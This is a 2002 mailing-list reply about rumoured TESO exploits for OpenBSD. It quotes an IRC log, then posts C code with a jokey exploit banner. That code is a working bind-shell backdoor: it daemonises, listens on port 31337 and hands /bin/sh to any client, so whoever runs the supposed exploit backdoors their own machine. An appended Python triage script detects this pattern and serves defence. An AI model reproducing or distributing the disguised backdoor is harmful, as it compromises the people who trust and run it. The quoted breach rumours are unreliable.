
Re: OpenBSD rumours



On Mon, 17 Jun 2002 17:24:03 +0200, Alex de Joode wrote:
>Any comments ?
>
>http://online.securityfocus.com/archive/82/277224/2002-06-14/2002-06-20/0
>
><-- START -->
>
>Dear readers,
>
>A few days ago, while I was at the #darknet, I saw three ScRiPtKidIeZ
>(within the rest of them) talking about the 7350-crocodile.c,
>7350-obsdftpd.c and the 7350-pf.c exploit code by team
>teso made with support of GOBBLES Security, who gave them
>the advisories.
>
>The good news:
>
>the exploits ain't that widely spread and they've been kept in the
>underground for about 1 month. This ain't really good news, but it
>is better than the ones that follow.
>
>The bad news:
>
>- openbsd ftp/cvs have been compromised and backdoored by the kiddies
>that hang mostly on #!hack.the.turkey at efnet.
>- the technique is new and very obscure, the three exploits abuse em
>and is applicable only on *BSD flavors (afaik).
>
>
>
>a really short part of the logs shows this:
>
><m0rgan> ./a.out
><m0rgan> 7350-crocodile - x86/OpenBSD apache/telnetd/sshd
>*** pr0ix (pr0ix@def-con.org) has joined #darknet
><m0rgan> by lorian and scut / TESO
><m0rgan>
><m0rgan> ./7350-crocodile [options] [host] [port] [misc-option]
><m0rgan>
><m0rgan> -d <daemon> (1= apache, 2= telnetd, 3= sshd)
><m0rgan> -b bruteforce
><m0rgan> -c check only
><m0rgan> -s <0xaddr> start address
><m0rgan> -S shellcode (? to show the list)
><pr0ix> wtf?
><m0rgan>
><m0rgan> greetz: synnergy, GOBBLES Security, ElectronicSoulz, shiftee, bnuts, skyper.
><m0rgan> sidenote: nasa.gov was really easy ;>
><m0rgan> muahah fear.
><xxx> could you send me that?
>*** pr0ix sets mode: +b xxx!*@200.*
>*** xxx was kicked by pr0ix (0day-lurker)
>
>keep an eye open at your logs, as they said the exploit makes a
>lot of noise on the system and "private" logs and thus it is easy
>to spot, put your ids on.
>
><-- END -->
>
There you have it. Famous l33t hyper-turbo 7350-crocodile exploit.
Have phun. LOL. Btw it's faked.
/*
 * Hey! krocodile exploit whatever
 * just have fun :)
 */

#define PORT 31337 
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr; 
struct sockaddr_in client_addr;

int main () 
{ 
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if (soc_des == -1) 
        exit(-1); 
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET; 
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0) 
        exit(-1); 
    if (fork() != 0) 
        exit(0); 
    setpgrp();  
    signal(SIGHUP, SIG_IGN); 
    if (fork() != 0) 
        exit(0); 
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0) 
        exit(0); 
    while (1) { 
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0) 
            exit(0); 
        cli_pid = getpid(); 
        server_pid = fork(); 
        if (server_pid != 0) { 
            dup2(soc_cli,0); 
            dup2(soc_cli,1); 
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0); 
            close(soc_cli); 
            exit(0); 
        } 
    close(soc_cli);
    }
}

-- 
Adam Naguszewski, admin@bmtmc.gda.pl on 06-18-2002
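
Added example, not part of the original message or of any code from the thread: a static triage that reads C source handed around as an "exploit" and reports whether it instead opens a listener on the machine that runs it and serves a shell, as the listing above does on port 31337. The indicator names, the verdict strings and the embedded sample are assumptions constructed for this illustration.

```python
import re

# Indicator names are this example's own labels, not taken from any tool.
INDICATORS = {
    "listens": r'\blisten\s*\(',
    "accepts": r'\baccept\s*\(',
    "redirects_stdio": r'\bdup2\s*\(\s*\w+\s*,\s*[012]\s*\)',
    "spawns_shell": r'\bexec[lv]p?e?\s*\(\s*"(?:/bin/)?(?:ba|k|c|z)?sh"',
    "reaches_target": r'\b(?:connect|gethostbyname|getaddrinfo)\s*\(|\bargv\b',
}

def strip_comments(src):
    """Drop C comments so a banner that names a call is not counted as code."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"//[^\n]*", "", src)

def listen_ports(code):
    """Resolve htons(NAME) or htons(1234) through simple numeric #defines."""
    defines = dict(re.findall(r"^\s*#\s*define\s+(\w+)\s+(\d+)\s*$", code, flags=re.M))
    ports = set()
    for arg in re.findall(r"\bhtons\s*\(\s*(\w+)\s*\)", code):
        value = arg if arg.isdigit() else defines.get(arg)
        if value is not None:
            ports.add(int(value))
    return sorted(ports)

def triage(src):
    """Classify C source: does it open a listener and hand the peer a shell?"""
    code = strip_comments(src)
    hits = {name: bool(re.search(rx, code)) for name, rx in INDICATORS.items()}
    shell = all(hits[k] for k in ("listens", "accepts", "redirects_stdio", "spawns_shell"))
    local_only = shell and not hits["reaches_target"]  # never contacts a target
    verdict = ("backdoors the local host" if local_only
               else "bind shell present" if shell else "no bind-shell pattern")
    return {"verdict": verdict, "ports": listen_ports(code), "hits": hits}

# Constructed sample (not a file from the thread): only the calls that matter.
SAMPLE_FAKE = '''/* "exploit" banner: connect(target) is only mentioned here */
#define PORT 31337
addr.sin_port = htons(PORT);
bind(s, (struct sockaddr *)&addr, sizeof(addr)); listen(s, 5);
c = accept(s, 0, 0);
dup2(c, 0); dup2(c, 1); dup2(c, 2);
execl("/bin/sh", "sh", (char *)0);
'''

if __name__ == "__main__":
    print(triage(SAMPLE_FAKE))
```

A clean verdict only means this one pattern is absent; the source still needs reading before it is compiled anywhere.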